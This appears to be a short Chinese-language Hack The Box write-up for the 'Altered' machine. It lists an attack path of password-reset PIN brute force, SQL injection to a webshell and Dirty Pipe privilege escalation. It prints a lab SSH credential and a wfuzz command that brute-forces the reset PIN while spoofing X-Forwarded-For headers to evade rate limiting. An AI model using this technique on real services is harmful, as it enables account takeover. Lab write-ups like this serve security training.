Skip to content

Altered

Altered

基本信息

export target="10.129.135.195"

ssh htb-ovuln@htb-we15mv8wps.htb-cloud.com

5m8otuMK

入侵路径

密码重置功能

绕过HTTP标头的速率限制进行暴力破解

利用SQL注入攻击获取WebShell(立足点)

利用Dirty Pipe 获取root权限

主机信息

开放端口 22 80

操作系统 Ubuntu
中间件 Nginx/1.18.0
脚本语言 PHP
开发框架 Laravel
Cookie XSRF-TOKEN,laravel_session

登录页面

尝试失败后出现密码重置功能。

爆破密码重置pin码

​ 绕过请求限制 XFF头

$wfuzz -u 'http://10.129.135.195/api/resettoken' -X POST -d 'name=admin&pin=FUZ2Z' -w ipa.txt -z range,0000-9999 -t 50 -H 'X-Forwarded-For: 127.2.FUZZ' -m zip -p 127.0.0.1:8080

登录后台